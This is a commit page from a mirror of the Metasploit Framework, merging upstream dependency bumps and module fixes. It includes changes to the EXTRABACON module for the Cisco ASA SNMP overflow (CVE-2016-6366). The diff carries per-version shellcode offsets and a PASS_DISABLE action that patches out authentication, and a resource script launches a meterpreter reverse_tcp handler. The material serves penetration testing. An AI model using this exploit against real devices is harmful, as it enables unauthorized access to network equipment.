infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge upstream/master into universal handler work

bug/bundler_fix
OJ 2016-11-28 15:26:43 +10:00
parent 496836fc06 60210f57e9
commit 5e8a47ac00
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
16 changed files with 98 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.ruby-version
View File

@ -1 +1 @@
2.3.2
2.3.3

2
.travis.yml
View File

@ -10,7 +10,7 @@ addons:
- graphviz
language: ruby
rvm:
- '2.3.2'
- '2.3.3'
env:
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true

48
Gemfile.lock
View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.13.1)
metasploit-framework (4.13.2)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -140,7 +140,7 @@ GEM
factory_girl_rails (4.7.0)
factory_girl (~> 4.7.0)
railties (>= 3.0.0)
faraday (0.9.2)
faraday (0.10.0)
multipart-post (>= 1.2, < 3)
ffi (1.9.14)
filesize (0.1.1)
@ -153,11 +153,11 @@ GEM
loofah (2.0.3)
nokogiri (>= 1.5.9)
metasm (1.0.2)
metasploit-concern (2.0.2)
metasploit-concern (2.0.3)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (2.0.7)
metasploit-credential (2.0.8)
metasploit-concern
metasploit-model
metasploit_data_models
@ -165,12 +165,12 @@ GEM
railties
rubyntlm
rubyzip
metasploit-model (2.0.2)
metasploit-model (2.0.3)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.2.1)
metasploit_data_models (2.0.8)
metasploit_data_models (2.0.9)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
arel-helpers
@ -196,7 +196,7 @@ GEM
network_interface (0.0.1)
nokogiri (1.6.8.1)
mini_portile2 (~> 2.1.0)
octokit (4.6.1)
octokit (4.6.2)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
@ -234,7 +234,7 @@ GEM
thor (>= 0.18.1, < 2.0)
rake (11.3.0)
rb-readline-r7 (0.5.2.0)
recog (2.0.24)
recog (2.1.0)
nokogiri
redcarpet (3.3.4)
rex-arch (0.1.2)
@ -245,42 +245,42 @@ GEM
rex-core
rex-struct2
rex-text
rex-core (0.1.2)
rex-encoder (0.1.0)
rex-core (0.1.3)
rex-encoder (0.1.1)
metasm
rex-arch
rex-text
rex-exploitation (0.1.2)
rex-exploitation (0.1.3)
jsobfu
metasm
rex-arch
rex-encoder
rex-text
rex-java (0.1.2)
rex-java (0.1.3)
rex-mime (0.1.1)
rex-text
rex-nop (0.1.0)
rex-arch
rex-ole (0.1.2)
rex-ole (0.1.3)
rex-text
rex-powershell (0.1.66)
rex-powershell (0.1.68)
rex-random_identifier
rex-text
rex-random_identifier (0.1.0)
rex-random_identifier (0.1.1)
rex-text
rex-registry (0.1.0)
rex-rop_builder (0.1.0)
rex-registry (0.1.1)
rex-rop_builder (0.1.1)
metasm
rex-core
rex-text
rex-socket (0.1.1)
rex-socket (0.1.2)
rex-core
rex-sslscan (0.1.0)
rex-sslscan (0.1.1)
rex-socket
rex-text
rex-struct2 (0.1.0)
rex-text (0.2.5)
rex-zip (0.1.0)
rex-text (0.2.9)
rex-zip (0.1.1)
rex-text
rkelly-remix (0.0.6)
robots (0.10.1)
@ -303,9 +303,9 @@ GEM
rspec-support (3.5.0)
rubyntlm (0.6.1)
rubyzip (1.2.0)
sawyer (0.8.0)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 0.10)
faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.1)
activesupport (>= 4.0.0)
simplecov (0.12.0)
@ -321,7 +321,7 @@ GEM
timecop (0.8.1)
tzinfo (1.2.2)
thread_safe (~> 0.1)
tzinfo-data (1.2016.9)
tzinfo-data (1.2016.10)
tzinfo (>= 1.0.0)
windows_error (0.0.2)
xpath (2.0.0)

2
lib/metasploit/framework/version.rb
View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.13.1"
VERSION = "4.13.2"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

2
lib/msf/core/exploit/http/client.rb
View File

@ -366,7 +366,7 @@ module Exploit::Remote::HttpClient
print_line('#' * 20)
print_line(res.to_s)
end
disconnect(c)
res
rescue ::Errno::EPIPE, ::Timeout::Error => e
print_line(e.message) if datastore['HttpTrace']

2
lib/msf/core/handler/reverse.rb
View File

@ -61,7 +61,7 @@ module Msf
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour."
end

2
lib/msf/core/handler/reverse_tcp_double_ssl.rb
View File

@ -63,7 +63,7 @@ module ReverseTcpDoubleSSL
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
end

2
lib/msf/core/handler/reverse_tcp_ssl.rb
View File

@ -43,7 +43,7 @@ module ReverseTcpSsl
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour."
end

8
lib/rex/ui/text/input/readline.rb
View File

@ -139,12 +139,16 @@ begin
# for rb-readline to support setting input and output. Output needs to be set so that colorization works for the
# prompt on Windows.
self.prompt = prompt
reset_sequence = "\001\r\033[K\002"
if (/mingw/ =~ RUBY_PLATFORM)
reset_sequence = ""
end
if defined? RbReadline
RbReadline.rl_instream = fd
RbReadline.rl_outstream = output
begin
line = RbReadline.readline("\001\r\033[K\002" + prompt)
line = RbReadline.readline(reset_sequence + prompt)
rescue ::Exception => exception
RbReadline.rl_cleanup_after_signal()
RbReadline.rl_deprep_terminal()
@ -158,7 +162,7 @@ begin
line.try(:dup)
else
::Readline.readline("\001\r\033[K\002" + prompt, true)
::Readline.readline(reset_sequence + prompt, true)
end
end

8
lib/rex/ui/text/output.rb
View File

@ -63,12 +63,16 @@ class Output < Rex::Ui::Output
end
def print_line(msg = '')
if (/mingw/ =~ RUBY_PLATFORM)
print(msg + "\n")
return
end
print("\033[s") # Save cursor position
print("\r\033[K" + msg + "\n")
if input and input.prompt
print("\r\033[K")
print(input.prompt)
print(input.line_buffer)
print(input.prompt.tr("\001\002", ''))
print(input.line_buffer.tr("\001\002", ''))
print("\033[u\033[B") # Restore cursor, move down one line
end
end

66
modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb
View File

@ -23,6 +23,7 @@ class MetasploitModule < Msf::Auxiliary
'Nate Caroe <nate.caroe@risksense.com>',
'Dylan Davis <dylan.davis@risksense.com>',
'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes
'Jeff Jarmoc <jjarmoc>', # minor improvements
'Equation Group',
'Shadow Brokers'
],
@ -32,19 +33,29 @@ class MetasploitModule < Msf::Auxiliary
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],
[ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'Actions' =>
[
['PASS_DISABLE', {'Description' => 'Disable password authentication.'} ],
['PASS_ENABLE', {'Description' => 'Enable password authentication.'} ]
],
'DefaultAction' => 'PASS_DISABLE'
)
@offsets = version_offsets()
register_options([
OptEnum.new('MODE', [ true, 'Enable or disable the password auth functions', 'pass-disable', ['pass-disable', 'pass-enable']])
OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),
], self.class)
deregister_options("VERSION")
datastore['VERSION'] = '2c' # SNMP v. 2c required it seems
end
@asa_version_snmp = '1.3.6.1.2.1.47.1.1.1.1.10.1'
@offsets = {
#"9.2(4)14" => ["197.207.10.8", "118.97.40.9", "72", "0.16.185.9", "112.31.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"],
def version_offsets()
# Payload offsets for supported ASA versions.
# See https://github.com/RiskSense-Ops/CVE-2016-6366
return {
"9.2(4)13" => ["197.207.10.8", "70.97.40.9", "72", "0.16.185.9", "240.30.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"],
"9.2(4)" => ["101.190.10.8", "54.209.39.9", "72", "0.48.184.9", "192.52.184.9", "85.49.192.137", "0.80.8.8", "0.91.8.8", "85.137.229.87"],
"9.2(3)" => ["29.112.29.8", # jmp_esp_offset, 0
@ -56,7 +67,6 @@ class MetasploitModule < Msf::Auxiliary
"0.80.8.8", # admauth_bounds, 6
"64.90.8.8", # admauth_offset, 7
"85.137.229.87"], # admauth_code, 8
"9.2(2)8" => ["21.187.10.8", "54.245.39.9", "72", "0.240.183.9", "16.252.183.9", "85.49.192.137", "0.80.8.8", "64.90.8.8", "85.137.229.87"],
"9.2(1)" => ["197.180.10.8", "54.118.39.9", "72", "0.240.182.9", "16.252.182.9", "85.49.192.137", "0.80.8.8", "176.84.8.8", "85.137.229.87"],
"9.1(1)4" => ["173.250.27.8", "134.177.3.9", "72", "0.112.127.9", "176.119.127.9", "85.49.192.137", "0.48.8.8", "96.49.8.8", "85.137.229.87"],
@ -90,13 +100,11 @@ class MetasploitModule < Msf::Auxiliary
"8.0(3)" => ["141.123.131.9", "156.138.160.8", "88", "0.128.9.9", "112.130.9.9", "85.49.192.137", "0.96.6.8", "176.96.6.8", "85.137.229.87"],
"8.0(2)" => ["155.222.211.8", "44.103.159.8", "88", "0.224.6.9", "32.237.6.9", "85.49.192.137", "0.80.6.8", "48.90.6.8", "85.137.229.87"]
}
end
def check
begin
snmp = connect_snmp
vers_string = snmp.get_value(@asa_version_snmp).to_s
vers_string = get_asa_version()
rescue ::Exception => e
print_error("Error: Unable to retrieve version information")
return Exploit::CheckCode::Unknown
@ -115,11 +123,11 @@ class MetasploitModule < Msf::Auxiliary
# adds offsets to the improved shellcode
# https://github.com/RiskSense-Ops/CVE-2016-6366/blob/master/shellcode.nasm
if mode == 'pass-disable'
if mode == 'PASS_DISABLE'
always_return_true = "49.192.64.195"
pmcheck_bytes = always_return_true
admauth_bytes = always_return_true
else
else # PASS_ENABLE
pmcheck_bytes = @offsets[vers_string][5]
admauth_bytes = @offsets[vers_string][8]
end
@ -157,16 +165,13 @@ class MetasploitModule < Msf::Auxiliary
end
def run()
begin
mode = datastore['MODE']
session = rand(255) + 1
snmp = connect_snmp
vers_string = snmp.get_value(@asa_version_snmp).to_s
vers_string = get_asa_version()
print_status("Building #{mode} payload for version #{vers_string}...")
overflow = build_payload(vers_string, mode)
print_status("Building #{action.name} payload for version #{vers_string}...")
overflow = build_payload(vers_string, action.name)
payload = SNMP::ObjectId.new(overflow)
print_status("Sending SNMP payload...")
@ -174,8 +179,9 @@ class MetasploitModule < Msf::Auxiliary
if response.varbind_list
print_good("Clean return detected!")
if mode == 'pass-disable'
print_warning("Don't forget to run pass-enable after logging in!")
if action.name == 'PASS_DISABLE'
print_warning("Don't forget to run PASS_ENABLE after logging in!")
print_warning(" set ACTION PASS_ENABLE")
end
end
@ -196,4 +202,24 @@ class MetasploitModule < Msf::Auxiliary
end
end
def get_asa_version()
return datastore['ASAVER'] unless (datastore['ASAVER'] == 'auto')
vprint_status("Fingerprinting via SNMP...")
asa_version_oid = '1.3.6.1.2.1.47.1.1.1.1.10.1'
mib2_sysdescr_oid = '1.3.6.1.2.1.1.1.0'
snmp = connect_snmp
ver = snmp.get_value(asa_version_oid).to_s
vprint_status("OID #{asa_version_oid} yields #{ver}")
if (ver == "noSuchInstance")
# asa_version_snmp OID isn't available on some models, fallback to MIB2 SysDescr
ver = snmp.get_value(mib2_sysdescr_oid).rpartition(' ').last
vprint_status("OID #{mib2_sysdescr_oid} yields #{ver}")
end
ver
end
end

1
modules/auxiliary/scanner/http/cisco_ironport_enum.rb
View File

@ -61,6 +61,7 @@ class MetasploitModule < Msf::Auxiliary
'method' => 'GET'
})
print_good("#{rhost}:#{rport} - Server is responsive...")
return 1
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
return
end

2
modules/auxiliary/scanner/http/owa_login.rb
View File

@ -195,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
if not res
print_error("#{msg} HTTP Connection Error, Aborting")
return :abort
return
end
if action.name != "OWA_2013" and res.get_cookies.empty?

1
modules/auxiliary/scanner/http/robots_txt.rb
View File

@ -60,6 +60,7 @@ class MetasploitModule < Msf::Auxiliary
end
print_status("[#{target_host}] #{tpath}robots.txt found")
print_good("Contents of Robots.txt:\n#{res.body}")
# short url regex
aregex = /llow:[ ]{0,2}(.*?)$/i

2
modules/auxiliary/scanner/smb/smb_enumusers.rb
View File

@ -312,7 +312,7 @@ class MetasploitModule < Msf::Auxiliary
extra << "PasswordMin=#{domains[domain][:pass_min]} "
extra << ")"
end
print_status("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}")
print_good("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}")
end
# cleanup

4
scripts/resource/auto_win32_multihandler.rc
View File

@ -13,6 +13,10 @@ def out_path
"#{Msf::Config::local_directory}/meterpreter_reverse_tcp.exe"
end
# Please see:
# https://github.com/rapid7/metasploit-framework/issues/7603
sleep(1)
run_single("use payload/#{PAYLOAD}")
run_single("set lhost #{payload_lhost}")
run_single("set lport #{payload_lport}")